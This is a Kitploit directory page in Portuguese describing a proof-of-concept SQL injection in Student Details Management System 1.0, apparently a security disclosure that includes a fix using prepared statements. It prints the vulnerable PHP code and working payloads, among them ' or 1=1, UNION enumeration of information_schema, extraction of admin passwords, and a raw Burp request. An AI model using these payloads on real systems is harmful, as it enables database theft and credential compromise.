Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/xmyronn/cve-2026-10110-sqli
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoSegurança de Banco de Dados
GitHubxmyronn/cve-2026-10110-sqli

CVE-2026-10110-SQLi

Prova de conceito para injeção SQL não autenticada no Student Details Management System 1.0, demonstrando extração de dados baseada em UNION e roubo de credenciais.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Sistema de Gestão de Detalhes de Estudantes 1.0 - Injeção de SQL (Não Autenticada)

Informações da Vulnerabilidade

CampoDetalhes
ProdutoStudent Details Management System
Fornecedorcode-projects.org
Versão1.0
Tipo de VulnerabilidadeInjeção de SQL (CWE-89)
ID CVEPendente
Pontuação CVSS9.8 Crítica (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Autenticação NecessáriaNão
Arquivo Afetado/SMS/index.php
Parâmetro Vulnerávelroll (POST)

Descrição

Existe uma vulnerabilidade crítica de injeção de SQL no arquivo index.php do Student Details Management System 1.0. O parâmetro roll enviado via requisição POST é diretamente concatenado em uma consulta SQL bruta, sem sanitização, validação de entrada ou uso de prepared statements. Isso permite que um atacante remoto não autenticado injete SQL arbitrário e realize extração de dados baseada em UNION, despejando todo o servidor de banco de dados, incluindo tabelas de credenciais.

A vulnerabilidade existe no formulário público de busca de estudantes, sem exigir qualquer autenticação.


Código Vulnerável

Arquivo: index.php (linhas 51–59)

root@kitploit:~
include('dbcon.php');
if (isset($_POST['show'])) {

    $Standard = $_POST['standard'];
    $RollNo = $_POST['roll'];

    $sql = "SELECT * FROM `student` WHERE `standard` = '$Standard' OR `rollno`='$RollNo'";

    $result = mysqli_query($conn,$sql);

Tanto $Standard quanto $RollNo são obtidos diretamente de $_POST sem escape ou parametrização. O atacante controla o parâmetro roll para sair do contexto da string SQL e injetar consultas arbitrárias.


Prova de Conceito

Passo 1 — Confirmar Comportamento Normal

Navegue até a página inicial do aplicativo e insira um número de matrícula válido:

root@kitploit:~
http://<TARGET>/SMS/index.php

Insira 1001 no campo de número de matrícula → o aplicativo retorna os registros do estudante normalmente.

Screenshot 2026-05-03 220510

Passo 2 — Disparar Erro de SQL (Confirmar Ponto de Injeção)

Insira uma aspa simples ' no campo de número de matrícula e clique em SHOW INFO.

Resultado: O MariaDB lança um erro fatal expondo a consulta SQL bruta e o caminho do arquivo:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near '"' at line 1 in 
C:\xampp\htdocs\STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\SMS\index.php:59
Screenshot 2026-05-03 220533

Passo 3 — Bypass de Autenticação / Despejo Completo da Tabela

Payload:

root@kitploit:~
' or 1=1 -- -

Resultado: Todos os registros de estudantes no banco de dados são retornados sem nenhum número de matrícula válido, confirmando que a injeção é explorável.

Screenshot 2026-05-03 220550

Passo 4 — Extração Baseada em UNION (Enumeração Completa do Banco de Dados)

Requisição Burp Suite:

root@kitploit:~
POST /STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE/SMS/index.php HTTP/1.1
Host: 192.168.0.9
Content-Type: application/x-www-form-urlencoded

roll=1001' union select null,null,table_name,null,null,null,null from information_schema.tables -- -&standard=SELECT+STANDARD&show=SHOW+INFO

Resultado: A coluna name (posição 3 no UNION) reflete de volta todos os nomes de tabelas em todos os bancos de dados da instância MySQL — incluindo admin, global_priv, users, mysql.user e tabelas de credenciais de vários outros aplicativos instalados na mesma instância XAMPP.

Screenshot 2026-05-03 220606

Passo 5 — Caminho de Escalação de Privilégios

O despejo revela tabelas sensíveis, incluindo admin, users, global_priv e tbl_admin de outros bancos de dados no mesmo servidor. Um atacante pode extrair credenciais com:

root@kitploit:~
roll=1' union select null,null,password,null,null,null,null from admin-- -

Combinado com a saída de erro detalhada (Passo 2), a divulgação completa do caminho do arquivo também é confirmada:

root@kitploit:~
C:\xampp\htdocs\STUDENT_DETAILS_MANAGEMENT_SYSTEM_IN_PHP_WITH_SOURCE_CODE\SMS\index.php

Impacto

  • Enumeração completa do banco de dados em todos os bancos de dados do servidor (não apenas o aplicativo alvo)
  • Extração de credenciais de administrador via despejo da tabela admin
  • Divulgação completa do caminho via saída de erro SQL detalhada
  • Nenhuma autenticação necessária — explorável por qualquer visitante não autenticado da página de busca
  • Potencial escalação de privilégios para outros aplicativos que compartilham a mesma instância MySQL

Correção

Use prepared statements com parâmetros vinculados:

root@kitploit:~
$stmt = $conn->prepare("SELECT * FROM `student` WHERE `standard` = ? OR `rollno` = ?");
$stmt->bind_param("ss", $Standard, $RollNo);
$stmt->execute();
$result = $stmt->get_result();

Além disso, desative a saída de erro detalhada do PHP/MySQL em produção definindo display_errors = Off no php.ini.


Referências

  • Página do Fornecedor
  • CWE-89: Injeção de SQL
  • OWASP Injeção de SQL

Descobridor

Pesquisador: Imad Alvi

Baixar ferramenta